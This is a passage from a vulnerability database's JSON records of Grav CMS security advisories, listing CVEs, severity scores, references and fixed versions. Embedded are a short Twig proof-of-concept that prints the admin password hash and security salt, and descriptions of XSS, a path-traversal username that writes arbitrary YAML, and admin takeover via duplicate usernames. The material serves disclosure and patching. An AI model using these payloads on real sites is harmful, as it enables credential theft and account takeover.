Page will render and display the administrator's Bcrypt hash and the system security salt.\n<img width=\"1278\" height=\"462\" alt=\"GRAV2\" src=\"https://github.com/user-attachments/assets/33b7b894-6ae3-4d29-bd2d-8004e9b343e0\" />\n\n\n\n\n\n\n\n## PoC\n```\n---\ntitle: Information Disclosure Test\nprocess:\n    twig: true\n---\n# Security Audit Results\n- Admin Password Hash: {{ grav['accounts'].load('admin').get('hashed_password') }}\n- Security Salt: {{ grav.config.get('security.salt') }}\n```\n\n## Impact\nAttackers can obtain the password hashes of all registered users, including Super Administrators.\n\nExtracted hashes can be subjected to offline brute-force or dictionary attacks (EX: USE Hashcat)\n\n## Video\nPls refer to the attached video\n<video src=\"https://github.com/user-attachments/assets/74d5ae41-7911-4099-b2cc-e6c51b27c68c\" controls=\"controls\" style=\"max-width: 100%;\">\n</video>\n\n\n\n---\n\n## Maintainer note — fix applied (2026-04-24)\n\nFixed in Grav core on the `2.0` branch: commit [`d904efc33`](https://github.com/getgrav/grav/commit/d904efc33) — will ship in **2.0.0-beta.2**.\n\n**What changed:** the HMAC key formerly stored as `security.salt` in `user/config/security.yaml` has moved **out of the Config tree** into `user/config/security-private.php`. On upgrade, the existing salt value is migrated into the new file on first request (preserving CSRF nonces and sessions) and the key is scrubbed from both the live `Config` object and the on-disk YAML — so `{{ grav.config.get('security.salt') }}` from a sandboxed Twig template now returns null. 
The `.php` extension is blocked from web access by the default `user/*.php` htaccess rule; the file contains only a `return` statement, so direct PHP exec produces no output either.\n\nThe PoC's password-hash half (`grav['accounts'].load('admin').get('hashed_password')`) was already covered by the new Twig content sandbox in 2.0.0-beta.2 — `UserCollection::load` is not in the sandbox allowlist — see the separate GHSA-58hj-46fw-rcfm advisory.\n\n**Files:**\n- [`system/src/Grav/Common/Security.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Security.php) — new `Security::getNonceKey()` + migration.\n- [`system/src/Grav/Common/Utils.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Utils.php) — `generateNonceString` now uses the new key.\n- [`system/src/Grav/Common/Service/SessionServiceProvider.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Service/SessionServiceProvider.php).\n- [`system/src/Grav/Common/Config/Setup.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Config/Setup.php) — removed auto-gen of `security.salt`.\n- [`system/config/security.yaml`](https://github.com/getgrav/grav/blob/2.0/system/config/security.yaml) — removed placeholder `salt:`.\n- [`tests/unit/Grav/Common/Security/NonceKeySecurityTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/NonceKeySecurityTest.php) — migration + generation coverage.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42610",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00027",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08191",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42610"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/c66dfeb5ff679a1667678c6335eb9ff3255dfc47",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T15:49:51Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/c66dfeb5ff679a1667678c6335eb9ff3255dfc47"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-3f29-pqwf-v4j4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T15:49:51Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-3f29-pqwf-v4j4"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42610",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42610"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-3f29-pqwf-v4j4",
                    "reference_id": "GHSA-3f29-pqwf-v4j4",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-3f29-pqwf-v4j4"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110986?format=api",
                    "purl": "pkg:composer/getgrav/grav@2.0.0-beta.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@2.0.0-beta.2"
                }
            ],
            "aliases": [
                "CVE-2026-42610",
                "GHSA-3f29-pqwf-v4j4"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-e61c-rd9y-wyhs"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/56433?format=api",
            "vulnerability_id": "VCID-egxp-rctq-xyh8",
            "summary": "Grav Cross-site Scripting vulnerability\nA cross-site scripting (XSS) vulnerability in Grav v1.7.45 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-35498",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00152",
                            "scoring_system": "epss",
                            "scoring_elements": "0.35687",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-35498"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/r4vanan/Stored-xss-Grav-v1.7.45",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-07T15:42:33Z/"
                        }
                    ],
                    "url": "https://github.com/r4vanan/Stored-xss-Grav-v1.7.45"
                },
                {
                    "reference_url": "https://r4vanan.medium.com/a-quick-dive-into-xss-vulnerability-in-grav-cms-v1-7-45-cve-2024-35498-fc236b7d74a0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-07T15:42:33Z/"
                        }
                    ],
                    "url": "https://r4vanan.medium.com/a-quick-dive-into-xss-vulnerability-in-grav-cms-v1-7-45-cve-2024-35498-fc236b7d74a0"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35498",
                    "reference_id": "CVE-2024-35498",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35498"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-m78c-qx99-mvw9",
                    "reference_id": "GHSA-m78c-qx99-mvw9",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-m78c-qx99-mvw9"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/81408?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.7.46",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-5kr2-3ywy-9kcn"
                        },
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-9tu1-4n1t-6bgv"
                        },
                        {
                            "vulnerability": "VCID-a375-aqzf-r7gw"
                        },
                        {
                            "vulnerability": "VCID-a8df-4jgt-gba4"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-abwg-zvc9-w7dq"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-bafn-ne38-nucy"
                        },
                        {
                            "vulnerability": "VCID-bhhz-z132-zkhb"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-esjd-ztwe-c3h1"
                        },
                        {
                            "vulnerability": "VCID-f3wx-5ayr-tqga"
                        },
                        {
                            "vulnerability": "VCID-fmmu-r77k-c7g2"
                        },
                        {
                            "vulnerability": "VCID-k8fd-bqpk-2qg8"
                        },
                        {
                            "vulnerability": "VCID-kbnn-6uws-kqh9"
                        },
                        {
                            "vulnerability": "VCID-p1u7-9mk4-fkcr"
                        },
                        {
                            "vulnerability": "VCID-p5d4-8rvg-uqem"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-rj4b-8dyu-juen"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-ss11-shq5-qqae"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-v8u1-nbxw-a7fr"
                        },
                        {
                            "vulnerability": "VCID-v9n7-vann-6fa5"
                        },
                        {
                            "vulnerability": "VCID-vm87-35gf-eyft"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        },
                        {
                            "vulnerability": "VCID-y7vc-cx37-7ubs"
                        },
                        {
                            "vulnerability": "VCID-ymnw-h6as-fbe5"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.46"
                }
            ],
            "aliases": [
                "CVE-2024-35498",
                "GHSA-m78c-qx99-mvw9"
            ],
            "risk_score": 1.4,
            "exploitability": "0.5",
            "weighted_severity": "2.7",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-egxp-rctq-xyh8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49302?format=api",
            "vulnerability_id": "VCID-esjd-ztwe-c3h1",
            "summary": "Grav vulnerable to Path traversal / arbitrary YAML write via user creation leading to Account Takeover / System Corruption\nWhen a user with the user-creation privilege creates a new user through the Admin UI and supplies a username containing path traversal sequences (for example ..\\Nijat or ../Nijat), Grav writes the account YAML file to an unintended path outside user/accounts/. The written YAML can contain account fields such as email, fullname, twofa_secret, and hashed_password. In my tests, I was able to cause the Admin UI to write the following content into arbitrary .yaml files (including files like email.yaml, system.yaml, or other site YAML files like admin.yaml) — demonstrating arbitrary YAML write / overwrite via the Admin UI.\n\nExample observed content written by the Admin UI (test data):\nusername: ..\\Nijat\nstate: enabled\nemail: [EMAIL@gmail.com](mailto:EMAIL@gmail.com)\nfullname: 'Nijat Alizada'\nlanguage: en\ncontent_editor: default\ntwofa_enabled: false\ntwofa_secret: RWVEIHC2AFVD6FCR6UHCO3DS4HWXKKDT\navatar: { }\nhashed_password: $2y$10$wl9Ktv3vUmDKCt8o6u2oOuRZr1I04OE0YZf2sJ1QcAherbNnk1XVC\naccess:\nsite:\nlogin: true",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66295",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00104",
                            "scoring_system": "epss",
                            "scoring_elements": "0.27961",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66295"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/3462d94d575064601689b236508c316242e15741",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:04:26Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/3462d94d575064601689b236508c316242e15741"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66295",
                    "reference_id": "CVE-2025-66295",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66295"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-h756-wh59-hhjv",
                    "reference_id": "GHSA-h756-wh59-hhjv",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-h756-wh59-hhjv"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-h756-wh59-hhjv",
                    "reference_id": "GHSA-h756-wh59-hhjv",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:04:26Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-h756-wh59-hhjv"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"
                }
            ],
            "aliases": [
                "CVE-2025-66295",
                "GHSA-h756-wh59-hhjv"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-esjd-ztwe-c3h1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49308?format=api",
            "vulnerability_id": "VCID-f3wx-5ayr-tqga",
            "summary": "Grav Admin Plugin vulnerable to Stored Cross-Site Scripting (XSS) at endpoint `/admin/config/site` via parameter `data[taxonomies]`\nA Stored Cross-Site Scripting (XSS) vulnerability was identified in the `/admin/config/site` endpoint of the _Grav_ application. This vulnerability allows attackers to inject malicious scripts into the `data[taxonomies]` parameter. The injected payload is stored on the server and automatically executed in the browser of any user who accesses the affected site configuration, resulting in a persistent attack vector.\n\n---",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66308",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00024",
                            "scoring_system": "epss",
                            "scoring_elements": "0.07273",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66308"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T16:13:50Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66308",
                    "reference_id": "CVE-2025-66308",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66308"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-gqxx-248x-g29f",
                    "reference_id": "GHSA-gqxx-248x-g29f",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-gqxx-248x-g29f"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-gqxx-248x-g29f",
                    "reference_id": "GHSA-gqxx-248x-g29f",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T16:13:50Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-gqxx-248x-g29f"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"
                }
            ],
            "aliases": [
                "CVE-2025-66308",
                "GHSA-gqxx-248x-g29f"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-f3wx-5ayr-tqga"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49334?format=api",
            "vulnerability_id": "VCID-fmmu-r77k-c7g2",
            "summary": "Grav vulnerable to Privilege Escalation in Grav Admin: Missing Username Uniqueness Check Allows Admin Account Takeover\nA privilege escalation vulnerability exists in Grav’s Admin plugin due to the absence of username uniqueness validation when creating users.\nA user with the create user permission can create a new account using the same username as an existing administrator account, set a new password/email, and then log in as that administrator. This effectively allows privilege escalation from limited user-manager permissions to full administrator access.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66296",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00062",
                            "scoring_system": "epss",
                            "scoring_elements": "0.19662",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66296"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/3462d94d575064601689b236508c316242e15741",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:05:57Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/3462d94d575064601689b236508c316242e15741"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66296",
                    "reference_id": "CVE-2025-66296",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66296"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-cjcp-qxvg-4rjm",
                    "reference_id": "GHSA-cjcp-qxvg-4rjm",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-cjcp-qxvg-4rjm"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-cjcp-qxvg-4rjm",
                    "reference_id": "GHSA-cjcp-qxvg-4rjm",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:05:57Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-cjcp-qxvg-4rjm"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api",
